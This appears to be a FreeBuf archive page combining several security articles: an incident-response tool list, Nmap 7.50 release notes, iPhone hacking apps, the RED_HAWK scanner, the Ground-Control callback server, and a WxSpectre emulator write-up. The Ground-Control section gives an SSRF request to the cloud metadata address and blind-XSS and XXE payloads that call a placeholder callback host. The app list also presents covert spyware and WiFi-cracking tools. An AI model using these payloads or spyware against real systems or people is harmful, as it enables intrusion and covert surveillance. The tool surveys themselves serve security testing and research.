分类目录归档:Hack

安全人员应急响应工具箱

*本文原创作者:Shun,本文属FreeBuf原创奖励计划,未经许可禁止转载

安全人员应急响应工具箱

本文旨在帮助安全分析师和DFIR团队更好的完成工作,现整理了一些现在比较流行的安全事件应急响应工具和资源列表。

工具集

书籍

社区

磁盘镜像创建工具

证据收集

应急管理

Linux 发行版

Linux 证据收集

日志分析工具

内存分析工具

内存镜像工具

OSX 证据收集

其他工具

Playbooks

进程 Dump 工具

沙盒 / 逆向工具

时间线工具

视频

Windows 证据收集

IR 工具收集

工具集

Belkasoft Evidence Center – 该工具包通过分析硬件驱动、驱动镜像、内存转储、iOS、黑莓与安卓系统备份、UFED、JTAG 与 chip-off 转储来快速从多个源提取数字证据

CimSweep – CimSweep 是一套基于 CIM/WMI 的工具,能够在所有版本的 Windows 上执行远程事件响应

CIRTkit – CIRTKit 不仅是一个工具集合,更是一个框架,帮助在事件响应与取证调查过程中统一

Cyber Triage – Cyber Triage 远程收集/分析终端数据,以帮助确定计算机是否被入侵.其专注易用性与自动化,采用无代理方法使公司在没有重大基础设施/没有取证专家团队的情况下做出响应,其结果用于决定是否应该被擦除或者进行进一步调查

Digital Forensics Framework – DFF 是一个建立在专用 API 之上的开源计算机取证框架,DFF 提出了一种替代目前老旧的数字取证解决方案,其设计简单/更加自动化,通过 DFF 接口可以帮助用户进行数字调查取证的主要步骤,专业与非专业人员都可以快速的进行数字取证并执行事件响应

Doorman – Doorman 是一个 osquery 的管理平台,可以远程管理节点的 osquery 配置.它利用 osquery 的 TLS 配置/记录器/分布式读写等优势为管理员提供最小开销的管理

Envdb – Envdb 将你的生产/开发/云等环境变成数据库集群,你可以使用 osquery 作为基础搜索,它可以和集群中心节点包装 osquery 的查询过程

Falcon Orchestrator – Falcon Orchestrator 是由 CrowdStrike 提供的一个基于 Windows 可扩展的应用程序,提供工作流自动化、案例管理与安全应急响应等功能

FIDO – Netflix 开发的 Fully Integrated Defense Operation (FIDO) 用于自动化评估/响应恶意软件入侵响应过程,FIDO 的主要目的是协助处理大量的手动工作来评估对安全堆栈的威胁与生成的大量警报

GRR Rapid Response – GRR Rapid Response 是一个用来远程现场取证的应急响应框架,其带有一个可以管理客户端的 Python 编写的服务器

Kolide – Kolide 是一个无代理的 osquery Web 接口与远程 API 服务器,Kolide 作为 Envdb 替代品的设计理念就是极度便携(仅有一个可执行程序),在保持代码简单的情况下保持性能

Limacharlie – 一个终端安全平台,它本身是一个小项目的集合,并提供了一个跨平台的低级环境,你可以管理并推送附加功能进入内存给程序扩展功能

MIG – Mozilla Investigator (MIG) 是一个在远程终端执行调查的平台,它可以在大量系统中并行获取数据,从而加速事故调查与保证日常业务安全

MozDef – Mozilla Defense Platform (MozDef) 旨在帮助安全事件处理自动化,并促进事件的实时处理

nightHawk – nightHawk Response Platform 是一个以 ElasticSearch 为后台的异步取证数据呈现的应用程序,设计与 Redline 配合调查

Open Computer Forensics Architecture – Open Computer Forensics Architecture (OCFA) 是另一个分布式开源计算机取证框架,这个框架建立在 Linux 平台上,并使用 postgreSQL 数据库来存储数据

Osquery – osquery 可以找到 Linux 与 OSX 基础设施的问题,无论你是要入侵检测还是基础架构可靠性检查 osquery 都能够帮助你提高公司内部的安全组织能力, incident-response pack 可以帮助你进行检测/响应活动

Redline – 为用户提供主机调查工具,通过内存与文件分析来找到恶意行为的活动迹象,包括对威胁评估配置文件的开发

The Sleuth Kit & Autopsy – Sleuth Kit 是基于 Unix 和 Windows 的工具,可以帮助计算机取证分析,其中包含各种协助取证的工具,比如分析磁盘镜像、文件系统深度分析等

TheHive – TheHive 是一个可扩展的三个一开源解决方案,旨在让 SOC、CSIRT、CERT 或其他任何信息安全从业人员方便的进行安全事件调查

X-Ways Forensics – X-Ways 是一个用于磁盘克隆、镜像的工具,可以查找已经删除的文件并进行磁盘分析

Zentral – 与 osquery 强大的端点清单保护能力相结合,通知与行动都灵活的框架,可以快速对 OS X 与 Linux 客户机上的更改做出识别与响应

书籍

Dfir intro – 作者:Scott J. Roberts

The Practice of Network Security Monitoring: Understanding Incident Detection and Response – 作者:Richard Bejtlich

社区

Sans DFIR mailing list – Mailing list by SANS for DFIR

Slack DFIR channel – Slack DFIR Communitiy channel – Signup here

磁盘镜像创建工具

AccessData FTK Imager – AccessData FTK Imager 是一个从任何类型的磁盘中预览可恢复数据的取证工具,FTK Imager 可以在 32/64 位系统上实时采集内存与页面文件

GetData Forensic Imager – GetData Forensic Imager 是一个基于 Windows 程序,将常见的文件格式进行获取/转换/验证取证

Guymager – Guymager 是一个用于 Linux 上媒体采集的免费镜像取证器

Magnet ACQUIRE – Magnet Forensics 开发的 ACQUIRE 可以在不同类型的磁盘上执行取证,包括 Windows/Linux/OS X 与移动操作系统

证据收集

bulk_extractor – bulk_extractor 是一个计算机取证工具,可以扫描磁盘映像、文件、文件目录,并在不解析文件系统或文件系统结构的情况下提取有用的信息,由于其忽略了文件系统结构,程序在速度和深入程度上都有了很大的提高

Cold Disk Quick Response – 使用精简的解析器列表来快速分析取证镜像文件(dd, E01, .vmdk, etc)并输出报告

ir-rescue – ir-rescue 是一个 Windows 批处理脚本与一个 Unix Bash 脚本,用于在事件响应期在主机全面收集证据

Live Response Collection – BriMor 开发的 Live Response collection 是一个用于从各种操作系统中收集易失性数据的自动化工具

应急管理

FIR – Fast Incident Response (FIR) 是一个网络安全应急管理平台,在设计时考虑了敏捷性与速度。其可以轻松创建、跟踪、报告网络安全应急事件并用于 CSIRT、CERT 与 SOC 等人员

RTIR – Request Tracker for Incident Response (RTIR) 对于安全团队来说是首要的开源应急处理系统,其与世界各地的十多个 CERT 与 CSIRT 合作,帮助处理不断增加的事件报告,RTIR 包含 Request Tracker 的全部功能

SCOT – Sandia Cyber Omni Tracker (SCOT) 是一个应急响应协作与知识获取工具,为事件响应的过程在不给用户带来负担的情况下增加价值

threat_note – 一个轻量级的调查笔记,允许安全研究人员注册、检索他们需要的 IOC 数据

Linux 发行版

ADIA – Appliance for Digital Investigation and Analysis (ADIA) 是一个基于 VMware 的应用程序,用于进行数字取证.其完全由公开软件构建,包含的工具有 Autopsy/Sleuth Kit/Digital Forensics Framework/log2timeline/Xplico/Wireshark 大多数系统维护使用 Webmin.可在各种系统下进行使用

CAINE – Computer Aided Investigative Environment (CAINE) 包含许多帮助调查人员进行分析的工具,包括取证工具

DEFT – Digital Evidence & Forensics Toolkit (DEFT) 是一个用于计算机取证的 Linux 发行版,它与 Windows 上的 Digital Advanced Response Toolkit (DART) 捆绑在一起.DEFT 的轻量版被成为 DEFT Zero

NST – Network Security Toolkit – 包括大量的优秀开源网络安全应用程序的 Linux 发行版

PALADIN – PALADIN 是一个附带许多开源取证工具的改 Linux 发行版,用于在法庭上以正确的方式执行取证任务

Security Onion – Security Onion 是一个特殊的 Linux 发行版,旨在利用高级的分析工具进行网络安全监控

SIFT Workstation – SANS Investigative Forensic Toolkit (SIFT) 使用优秀开源工具以实现高级事件响应与入侵深度数字取证,这些功能免费提供,并且经常更新

Linux 证据收集

FastIR Collector Linux – FastIR 在 Linux 系统上收集不同的信息并将结果存入 CSV 文件

日志分析工具

Lorg – 一个用 HTTPD 日志进行高级安全分析与取证的工具

内存分析工具

Evolve – Volatility 内存取证框架的 Web 界面

inVtero.net – 支持 hypervisor 的 Windows x64 高级内存分析

KnTList – 计算机内存分析工具

LiME – LiME 是 Loadable Kernel Module (LKM),可以从 Linux 以及基于 Linux 的设备采集易失性内存数据

Memoryze – 由 Mandiant 开发的 Memoryze 是一个免费的内存取证软件,可以帮助应急响应人员在内存中定位恶意部位, Memoryze 也可以分析内存镜像或者装成带有许多分析插件的系统

Memoryze for Mac – Memoryze for Mac 是 Memoryze 但仅限于 Mac,且功能较少

Rekall – 用于从 RAM 中提取样本的开源工具

Responder PRO – Responder PRO 是一个工业级的物理内存及自动化恶意软件分析解决方案

Volatility – 高级内存取证框架

VolatilityBot – VolatilityBot 是一个自动化工具,帮助研究员减少在二进制程序提取解析阶段的手动任务,或者帮助研究人员进行内存分析调查的第一步

WindowsSCOPE – 一个用来分析易失性内存的取证与逆向工程工具,被用于对恶意软件进行逆向分析,提供了分析 Windows 内核/驱动程序/DLL/虚拟与物理内存的功能

内存镜像工具

Belkasoft Live RAM Capturer – 轻量级取证工具,即使有反调试/反转储的系统保护下也可以方便地提取全部易失性内存的内容

Linux Memory Grabber – 用于 dump Linux 内存并创建 Volatility 配置文件的脚本

Magnet RAM Capture – Magnet RAM Capture 是一个免费的镜像工具,可以捕获可疑计算机中的物理内存,支持最新版的 Windows

OSForensics – OSForensics 可以获取 32/64 位系统的实时内存,可以将每个独立进程的内存空间 dump 下来

OSX 证据收集

Knockknock – 显示那些在 OSX 上被设置为自动执行的那些脚本、命令、程序等

OSX Auditor – OSX Auditor 是一个面向 Mac OS X 的免费计算机取证工具

OSX Collector – OSX Auditor 的实时响应版

其他工具

Cortex – Cortex 可以通过 Web 界面逐个或批量对 IP 地址/邮件地址/URL/域名/文件哈希的分析,还可以使用 REST API 来自动执行这些操作

Crits – 一个将分析引擎与网络威胁数据库相结合且带有 Web 界面的工具

Fenrir – Fenrir 是一个简单的 IOC 扫描器,可以在纯 bash 中扫描任意 Linux/Unix/OSX 系统,由 THOR 与 LOKI 的开发者创作

Fileintel – 为每个文件哈希值提供情报

Hindsight – Google Chrome/Chromium 的互联网

Hostintel – 为每个主机提供情报

Kansa – Kansa 是一个 PowerShell 的模块化应急响应框架

rastrea2r – 使用 YARA 在 Windows、Linux 与 OS X 上扫描硬盘或内存

RaQet – RaQet 是一个非常规的远程采集与分类工具,允许对那些为取证构建的操作系统进行远端计算机的遴选

Stalk – 收集关于 MySQL 的取证数据

SearchGiant – 从云服务中获取取证数据的命令行程序

Stenographer – Stenographer 是一个数据包捕获解决方案,旨在快速将全部数据包转储到磁盘中,然后提供对这些数据包的快速访问.它存储尽可能多的历史记录并且管理磁盘的使用情况,在磁盘受限被触发时执行既定策略,非常适合在事件发生前与发生中捕获流量,而不是显式存储所有流量

traceroute-circl – 由 Computer Emergency Responce Center Luxembourg 开发的 traceroute-circl 是一个增强型的 traceroute 来帮助 CSIRT/CERT 的工作人员,通常 CSIRT 团队必须根据收到的 IP 地址处理事件

X-Ray 2.0 – 一个用来向反病毒厂商提供样本的 Windows 实用工具(几乎不再维护)

Playbooks

Demisto Playbooks Collection – Playbook 收集

IR Workflow Gallery – 不同的通用事件响应工作流程,例如恶意软件爆发/数据窃取/未经授权的访问等,每个工作流程都有七个步骤:准备/检测/分析/遏制/根除/恢复/事后处理

PagerDuty Incident Response Documentation – 描述 PagerDuty 应急响应过程的文档,不仅提供了关于事件准备的信息,还提供了在此前与之后要做什么工作,源在 GitHub 上

进程 Dump 工具

Microsoft User Mode Process Dumper – 用户模式下的进程 dump 工具,可以 dump 任意正在运行的 Win32 进程内存映像

PMDump – PMDump 是一个可以在不停止进程的情况下将进程的内存内容 dump 到文件中的工具

沙盒/逆向工具

Cuckoo – 开源沙盒工具

Cuckoo-modified – 社区基于 Cuckoo 的大修版

Cuckoo-modified-api – 一个用来控制 Cuckoo 沙盒设置的 Python 库

Hybrid-Analysis – Hybrid-Analysis 是一个由 Payload Security 提供的免费在线沙盒

Malwr – Malwr 是由 Cuckoo 沙盒提供支持的一个免费在线恶意软件分析服务

Mastiff – MASTIFF 是一个静态分析框架,可以自动化的从多种文件格式中提取关键特征

Viper – Viper 是一个基于 Python 的二进制程序分析及管理框架,支持 Cuckoo 与 YARA

Virustotal – Virustotal, Google 的子公司,一个免费在线分析文件/URL的厂商,可以分析病毒/蠕虫/木马以及其他类型被反病毒引擎或网站扫描器识别的恶意内容

Visualize_Logs – Cuckoo、Procmon等日志的开源可视化库

时间线工具

Highlighter – Fire/Mandiant 开发的免费工具,用来分析日志/文本文件,可以对某些关键字或短语进行高亮显示,有助于时间线的整理

Plaso – 一个基于 Python 用于 log2timeline 的后端引擎

Timesketch – 协作取证时间线分析的开源工具

视频

Demisto IR video resources – 应急响应与取证分析的视频资源

The Future of Incident Response – Bruce Schneier 在 OWASP AppSecUSA 2015 上的分享

Windows 证据收集

AChoir – Achoir 是一个将对 Windows 的实时采集工具脚本化变得更标准与简单的框架

Binaryforay – 一个 Windows 取证的免费工具列表 (http://binaryforay.blogspot.co.il/)

Crowd Response – 由 CrowdStrike 开发的 Crowd Response 是一个轻量级 Windows 终端应用,旨在收集用于应急响应与安全操作的系统信息,其包含许多模块与输出格式

FastIR Collector – FastIR Collector 在 Windows 系统中实时收集各种信息并将结果记录在 CSV 文件中,通过对这些信息的分析,我们可以发现早期的入侵痕迹

FECT – Fast Evidence Collector Toolkit (FECT) 是一个轻量级的应急响应工具集,用于在可疑的 Windows 计算机上取证,它可以让非技术调查人员更专业的进行应急处理

Fibratus – 利用与跟踪 Windows 内核的工具

IOC Finder – IOC Finder 是由 Mandiant 开发的免费工具,用来收集主机数据并报告存在危险的 IOC

Fidelis ThreatScanner – Fidelis ThreatScanner 是一个由 Fidelis Cybersecurity 开发的免费工具,使用 OpenIOC 和 YARA 来报告终端设备的安全状态,ThreatScanner 衡量系统的运行状态后会出具匹配情况的报告,仅限 Windows

LOKI – Loki 是一个使用 YARA 与其他 IOC 对终端进行扫描的免费 IR 扫描器

PowerForensics – PowerShell 开发的实时硬盘取证框架

PSRecon – PSRecon 使用 PowerShell 在远程 Windows 主机上提取/整理数据,并将数据发送到安全团队,数据可以通过邮件来传送数据或者在本地留存

RegRipper – Regripper 是用 Perl 编写的开源工具,可以从注册表中提取/解析数据(键/值/数据)提供分析

TRIAGE-IR – Triage-IR 是一个 Windows 下的 IR 收集工具

参考资料

1. https://github.com/sindresorhus/awesome

2. http://www.freebuf.com/tools/87400.html

*本文原创作者:Shun,本文属FreeBuf原创奖励计划,未经许可禁止转载

Nmap 7.50更新:自去年12月来的重大更新

Network Mapper 近日发布了最新更新 Nmap  7.50 ,上一次的更新还需要追溯到2016年12月,而此次的版本上对于对于数百项功能进行了改进。

Nmap 7.50更新:自去年12月来的重大更新

Nmap 7.50 的此次更新包括了 Windows 下的 Npcap 数据捕获驱动程序和库,而 WinPcap 则不再继续维护。 Npcap 是一组全新的API,不仅在性能上有所提升,还能保证与大多数流行操作系统(包括Windows 10)的软件兼容性。

在新版本中,此次更新增添了对于环回数据包的捕获、注入以及无线嗅探的功能。

它可以作为 WinPcap 的替代,WinPcap已经用了很多年了,我们不再继续维护了。而 Npcap使用了全新的 API 来提高性能和兼容性,增加了对 Windows 10的支持。我们还添加了环回数据包捕获和注入,针对beacon帧等等的无线嗅探,也增加了额外的安全功能如需要管理员的授权访问。

——Seclists.org

新版本包括300多个新的服务检测摘要和许多其他改进点。现在的Network mapper 可以在ApacheMQ,bro,和clickhouse到 jmon, SLMP, 以及 zookeeper中检测1193 种协议。

全新的脚本引擎

Nmap 7.50还改进了Nmap脚本引擎,维护者发布了一个针对 MS17-010(Wannacry 及Sambacry CVE 2017-7494可利用此漏洞)的检测脚本。

包含以下脚本:

  • broadcast-ospf2-discover
  • cics-info
  • cics-user-brute
  • http-cookie-flags
  • http-security-headers
  • http-vuln-cve2017-5638
  • http-vuln-cve2017-5689
  • http-vuln-cve2017-1001000
  • impress-remote-discover
  • smb-double-pulsar-backdoor
  • smb-vuln-cve-2017-7494
  • smb-vuln-ms17-010
  • tls-ticketbleed
  • vmware-version

下载地址

一些新的针对Apache HBase及Hadoop MapReduce的探查也在此次更新中有所涉及,可以在此查看完整列表。

读者可以从这里下载适用于Linux,Windows和Mac的Nmap 7.50源代码和二进制包。

*参考来源:securityaffairs,Elaine编译,转载请注明FreeBuf.COM

2017年最佳iPhone渗透APP及工具

2017年最佳iPhone渗透APP及工具

与Android不同,搜索和查找iPhone的黑客工具及应用是一项艰巨的任务。这与ios系统及其强大的安全性不无关系。由于许多黑客工具,必须要以‘root’的权限才能正常运行,而iPhone的越狱却是件让人头疼的事情。在加上iOS平台无法通过App Store分享黑客相关的应用,难度可想而知。

那么iPhone上真的就无法使用任何黑客应用了吗?当然不是啦!下面,我就为大家隆重推荐几款iPhone下最佳的黑客应用及工具。

Cydia是什么?以及我们为什么要使用它?

如果你是一个追求应用自由的iOS用户,那么你肯定听说过Cydia。这是iPhone,iPad和iPod Touch的另一款App Store。它提供了许多App Store无法使用,以及因违反使用条款而被拒绝的应用程序。

每当你进行越狱的时候 – 常常会出现安装Cydia的选项。此外,它也可以通过Installer.app/AppTap单独安装。使用Cydia,你可以安装许多应用程序和工具,包括本文将提到的应用程序和工具。所以在某种程度上来讲,想要使用这些iPhone黑客应用和逆向工程工具,你需要一个已越狱的iPhone设备作为先决条件。好了说了这么多,下面让我们正式开始介绍它们:

免责声明:本文提及的iOS应用和工具,只用于研究学习目的。道德黑客和开发人员,可以使用这些工具来保护其应用程序和服务的安全性。

1. iRET – iOS逆向工程工具包

渗透测试人员在某些时候,常常需要对一些特定的任务进行反复的测试,才能取得成功并提高效率。但这对于测试人员而言,是件非常低效率的事。为了解决这个问题,研究人员Veracode开发出了iRET这款工具。这是一款iOS逆向工程的工具箱,主要用于自动化执行与iOS渗透测试相关的大量通用任务以及静态分析。此外想要成功安装它,还需要在你的设备上安装python环境。

 iRET GitHub链接

2. netKillUIbeta

NetKillUIbeta这款应用,类似于Android下的WiFiKill。其主要作用是帮助宽带用户将蹭网者进行屏蔽。想要安装此工具,你可以将此repo http://extigy.github.io/repo/添加到Cydia,并安装netKillUIbeta及其依赖关系。值得一提的是如果你恶意使用该工具,你的MAC地址是可以被追踪到的。

— netKillUIbeta Cydia链接

3. iWep Pro

iWep Pro是一款无线路由器破解软件,主要用以破解以WEP加密协议加密的无线WiFi网络密码。当然除此之外它还支持WPA的密码破解,同时还可以对目标路由器进行漏洞检测。而至于密码的破解速度及成功率,则要取决于目标设备的密码强度而决定了。

 — iWep Pro

4. Myriam iOS Security App

Myriam是由安全研究人员和GitHub用户GeoSn0w共同开发的。他将其描述为是iOS黑客初学者,最想拥有的应用程序。它包含各种已知的和可被利用的漏洞。同时使用者可以很轻松的使用该应用,完成对应用内的数据修改,应用激活绕过和越狱检测以及UIKit等操作。

— Myriam GitHub链接

5. Burp

Burp想必大家再熟悉不过了,它的功能非常的强大。例如HTTP包代理截断,web扫描,fuzz测试等。在iOS平台我们也可以安装一个手机版的Burp,它可以为我们测试设备及应用程序的安全性,对应用流量进行分析。需要提醒的是想要成功侦听网络流量,Burp Proxy的配置不能忘。

 iOS Burp

6. iSpy

BishopFox的iSpy iPhone逆向工程应用,可以做为iOS应用程序动态分析的一站式解决方案。易于使用的Web GUI可用于类转储,实例跟踪,越狱检测绕过,SSL证书绕过等。

— iSpy GitHub链接

7. Hopper App

Hopper Disassembler是一款逆向工程工具,iOS爱好者可以使用它来进行反汇编,反编译和调试应用程序。此工具也可用于修改和重组代码。你只需在你的macOS或Linux系统上启动该应用,然后将其指向你需要破解的二进制文件即可。总的来说Hopper是一款非常好用的逆向工程工具,对于热衷于iOS漏洞赏金的人而言,无疑它将成为一个首选。

 iOS Hopper

8. Cycript

Cycript是一款实用的动态分析工具,可用于分析在iPhone,iPad或其他iDevices上运行的应用程序。同时Cycript也是一个JavaScript解释器,此外它还可以理解Objective-C语言。 在对iOS运行应用的动态分析时,我们可以随时在需要的地方设置断点。在动态分析方面,Cycpi已被证明是非常有效的。

— Cycript

9. Paraben DS

Paraben DS是一款用于移动设备的调查取证的工具。你可以在计算机上安装此应用程序,启动其GUI,并连接Apple iPhone和iTouch设备。其主要功能包括数据采集,逻辑和物理镜像,应用程序数据解析,密码绕过,恶意软件检测和数据雕刻等。

— Paraben DS

10. Frida

Frida是一款基于python + javascript 的hook与调试框架,通杀android/ios/linux/win/osx等各平台。它支持将V8 JavaScript脚本引擎,注入到正在运行的进程当中。它支持两种操作模式 – 越狱和非越狱。如果是越狱设备,Frida还可以实现对系统服务和应用程序的轻松控制。

— iOS Frida 

11. Firecat

Firecat是一款可以安装并用于,从被劫持的网络中建立TCP反向隧道的工具。当你为iPhone建立隧道后,即使网络中使用了严格的防火墙策略或NAT网关,你也可以通过外部的主机连接到该网络中的任意端口。

— Firecat

12. Highster Mobile

Highster Mobile是一款间谍监控程序。一旦手机成功安装上它,它就会以完整的检测方式秘密的监控你的手机活动。使用该应用程序,你可以对目标设备进行远程控制,监视其桌面活动,甚至可以随时卸载掉目标设备的应用程序等。

 Highster Mobile

*参考来源:fossbytes,FB小编 secist 编译,转载请注明来自FreeBuf(FreeBuf.COM)

RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具

今天给大家介绍的这款工具名叫RED HAWK(红鹰??),这是一款采用PHP语言开发的多合一型渗透测试工具,它可以帮助我们完成信息采集、SQL漏洞扫描和资源爬取等任务。

RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具

RED HAWK

最新版本:v1.0.0【2017年6月11日】

下载地址:【GitHub传送门

RED HAWK的功能

1.   服务器检测

2.   Cloudflare检测

3.   网站robots扫描

4.   CMS检测:

a)    WordPres

b)    Joomla

c)   Drupal

d)   Magento

5.   Whois查询

6.   GEO-IP扫描

7.   NMAP端口扫描

8.   子网计算

9.   子域名搜索

10.   逆向IP扫描:

a)   检测同一台服务器上的其他CMS 站点

11.    参数查询:

a)   基于错误信息的SQLi检测器

12.   网络爬虫

a)   基本爬虫{69}

i.   管理员扫描

ii.   备份文件搜索

iii.   混合爬取

b)   高级爬虫{420}

i.   管理员搜索

ii.   备份文件搜索

iii.   混合爬取

修改日志

版本v1.0.0:项目刚刚上线GitHub,工具首发,感兴趣的朋友可以贡献自己的代码,让RED HAWK的功能变得越来越强大!

工具安装和使用

在命令行工具中通过git将项目克隆到本地:

git clone https://github.com/Tuhinshubhra/RED_HAWK

切换到本地项目目录:

cd RED_HAWK

然后打开根目录下的rhawk.php:

php rhawk.php

运行工具,然后输入“fix”,工具会自动安装所有的依赖组建以及功能模块。

接下来,你还可以使用“help”命令来查看命令列表,或者你也可以直接输入你想要扫描的域名(不需要输入Http://或Https://)。

然后根据提示选择目标网站是否使用了HTTPS,剩下的工作就交给RED HAWK去完成吧!

后话

该项目刚刚上线GitHub,希望社区大神有空的时候能够贡献自己的一份力量,让社区多一款可供白帽子使用的渗透测试工具。

* 参考来源:Tuhinshubhra, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

一款用于发现SSRF、XXE、XSS漏洞的小工具

今天给大家介绍的是运行在我自己Web服务器中的一堆脚本,这些脚本可以帮助我快速检测SSRF、Blind XXS以及XXE漏洞,喜欢的朋友可以将它们部署到自己的环境中。当然了,你们也可以根据自己的需要来自定义修改脚本代码。

一款用于发现SSRF、XXE、XSS漏洞的小工具

Ground-Control(GitHub传送门

我这个GitHub库中托管的是我在服务器端所部属的一些安全增强脚本,它们可以检测SSRF(服务器端请求伪造),Blind XSS、以及XXE漏洞。目前本项目仍处于更新过程中,因为我现在还在收集相关的脚本。在使用这些脚本之前,我通常会重写脚本中的部分代码或通过netcat设置监听器。但这样做的灵活性就非常差了,因此我才决定将这些脚本都上传到一个代码库上,这样每当服务器需要使用某个脚本时,我们就可以直接从GitHub代码库中克隆下来即可。

必备条件

脚本的运行需要Ruby 2.3、域名的有效SSL证书、以及一台能够开启端口80、443、8080和8443的Web服务器。端口80和443用来处理简单的Web流量;端口8080也是一个HTTP端口,当端口80无法正常访问时可以用端口8080来处理网络通信数据;端口8443是一个用来处理HTTPS流量的替代段藕,不同的是它需要使用自签名的SSL证书,我可以使用这个端口来判断服务器的SSL证书是否有效。

工具配置

将该项目克隆到本地,然后通过运行“install.sh“来安装本工具的必备组件。依赖组件安装完成之后,运行“start.sh”来监听所有的端口。因为脚本需要监听端口80和433,因此我们还需要root权限才行,但是在将来的版本中我们会尝试通过切换用户环境来解决这个问题。

功能介绍

Redirects

/redirect节点用来将一个请求重定向到另一台服务器或网络节点,当你需要一台外部服务器请求重定向到内部系统时,你可以使用这项功能。使用样例如下:

curl -vv "http://server/redirect?url=http://169.254.169.254/latest/meta-data/"

Ping Pong

有时你可能需要一个能够响应指定body和header的页面,而/ping_pong节点就是你所需要的。使用样例如下:

curl -vv "http://server/ping_pong?body=%3ch1%3eHello%3c/h1%3e"

Blind Callback

如果你想要知道一个无法直接访问的系统是否执行了你的HTML代码或XSS Payload,你可以在config.json文件中添加一个callback_tokens参数,数据结构如下所示:

{
  "callback_tokens": {
    "ee34a1791ab345f789": {
      "host":"hackerone.com",
      "port": 443,
      "ssl": true,
      "path": "/webhooks",
      "parameter": "url",
      "method": "POST"
    }
  }
}

这个callback中包含了攻击目标(插入Payload的地方)的相关信息,如果你收到了一个callback,那么它将可以帮助你验证漏洞出现的根本原因。需要注意的是,其中的每一个参数(parameter、host、port、path和method)都需要拥有自己的callback_token。

你可以根据你所要测试的漏洞类型来构建自己的Payload,下面给出的是针对HTML注入漏洞和XSS漏洞的测试用例。接下来,将你的Payload通过注入点提交给服务器。当带有callback_token的请求被触发之后,你将能够在logs/access_log中查看到日志记录。绝大多数情况下,我会使用命令“tail -f logs/access_log”来查看漏洞和请求的触发情况。

HTML注入:

<img src="https://server/pixel?callback_token=ee34a1791ab345f789" style="display:none;"/>

Blind XSS:

<script src="https://server/collect?callback_token=ee34a1791ab345f789"></script>

XXE:

<?xmlversion="1.0" ?>
<!DOCTYPEr [
<!ELEMENTr ANY >
<!ENTITYsp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>

开启另一台服务器

服务器默认会监听端口80、443、8080、8443,但如果你想开启另外一台服务器来监听其他端口的话,你可以运行命令“ruby app/server.rb -p :port”。如果你想使用SSL,你可以在刚才的命令后面添加“-cert :cert.pem”。当一个潜在的SSRF漏洞只允许我们连接特定端口的话,这个功能就非常有用了。

* 参考来源:jobertabma,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

基于unicorn-engine的虚拟机的实现(WxSpectre)

* 本文作者:比尔.盖茨(twitter@ma1fan),本文属FreeBuf原创奖励计划,未经许可禁止转载

反病毒虚拟机是一个很有优势的工具,可以说反病毒软件是否存在模拟器是衡量反病毒软件能力的一个指标。反病毒虚拟机不光是内嵌在反病毒软件内部,来动态执行样本。这种虚拟机一般也可以单独用来动态执行批量样本,检测样本恶意行为,因为它相对virualbox+cuckoo更加的轻巧,节省资源。所以还是有很高的价值的。正因为其高效性与复杂性,现在公开这方面的资料很少。

一、虚拟机vs模拟器

对于恶意样本分析领域,沙箱,虚拟机,模拟器,一个原则就是执行指令不会影响host环境. 

  Method Performance Execution granularity System fidelity
VirtualBox Virtualization/VT Quick +,  heavily N/A Very good
Bochs Full emulation Slow,   tiny Instruction level Very good
Uniron-engine Emulation/dynamic translation Quick,  tiny Instruction level N/A

 virtualbox除过特权指令和部分ring0中运行的指令,是直接在宿主机上运行的。所以运行速度与宿主机没有很大差异。Bochs是纯粹的软件模拟器,另外加上对硬件的模拟,所以其指令执行速度是非常慢的。Unicorn-engine基于动态翻译技术,速度相对于纯粹的指令模拟快的多.

所以如果关心系统仿真度当然选择virtualbox,bochs,但是virtualbox会耗费更多的系统资源。

Unicorn-engine可以虚拟执行x86,x64,arm等指令集。因为其基于动态翻译和部分模拟来执行目标指令,效率比bochs快的多。

很显然,unicorn-engine只是一个”CPU”,所以要想运行样本还缺的是一个windows的运行应用程序的环境。

WxSpectre就是这样基于unicorn-engine的windows仿真环境来实现的虚拟机。

二、关于WxSpectre

Windows是一个多进程环境,这是现代操作系统的普遍的标配。但是在运行恶意样本的时候,我们只关心的恶意样本做了什么,而且为了避免产生干扰一次只能运行一个样本,这就造成了很大的浪费,其实只要满足样本运行所需要的环境就可以,但是我们却提供了一个完整的windows环境,显然杀鸡用了宰牛刀。如果我们只提供运行目标样本所需的基本环境,显然这将节省很多的资源。WxSpectre基本上实现了这一目标。

WxSpectre由两大部分组成:Unicorn-engine+仿真WINDOWS系统环境.WxSpectre实现了大部分的windows执行应用程序的环境,包括文件系统,对象管理,注册表,线程调度,内存管理,异常/中断处理,Windows API(ring3).pe 执行环境初始化模块。

WxSpectre可以跨平台在windows,linux,Mac os,下运行,可以虚拟执行EXE/VBS脚本。

目前实现的功能是:1.api trace.2.运行时内存dump.3.指令trace,4,虚拟调试5.内存字符串提取等。

WxSpectre的框架结构:

基于unicorn-engine的虚拟机的实现(WxSpectre)

1.内存管理:

包括内存的申请释放,堆内存管理。

2.线程调度:

线程切换,线程调度。

3.异常处理:

将cpu的异常传送到hyperviror,然后经过过滤处理,然后分发给相应的处理函数。

4.对象管理:

主要是指对象初始化,对象同步,对象释放,对象的访问。

5.WxVFS:

指的是虚拟文件系统,有点类似于linux的VFS系统,但是所不同的是这里不是为了实现一个统一的文件系统界面,这里主要是虚拟出文件系统的结构。从而使WxSpectre中所有样本访问文件系统的操作得以执行。比如读写文件,创建,删除,文件,目录等。

6.Wxhelper:

所用的api调用将会重定位到这个模块中,然后执行。

7.脚本引擎(WxNscript):

这里的脚本引擎主要用来执行vbs,js脚本.因为现在越来越多的病毒会利用脚本文件了来作为传播载体.

8.兼容层:

在WxSpectre执行应用程序的时候,有的时候需要打补丁,patch某些指令序列从而让样本能顺利执行下去(因为存在某些反虚拟机,反模拟器样本或者其他的异常行为导致执行出现错误,或者奔溃)。

9.虚拟注册表(WxRegistry)

Windows程序执行需要依赖注册表。WxRegistry是对注册表的虚拟。

10.网络访问模块(WxNetwork)

WxNetwork会虚拟出一个sever模块,当有样本请求数据,wxnetwork会与其回话。

WxSpectre的功能:

1. API trace 

Api trace是勾勒样本动态行为的一个很重要的方面。这里只记录样本直接调用的api日志。不会记录嵌套在api内部的api调用,这样分析者更加能抓住重点。Cuckoo不好的一点api的记录没有做过滤。 

2. 虚拟文件系统(WxVFS)

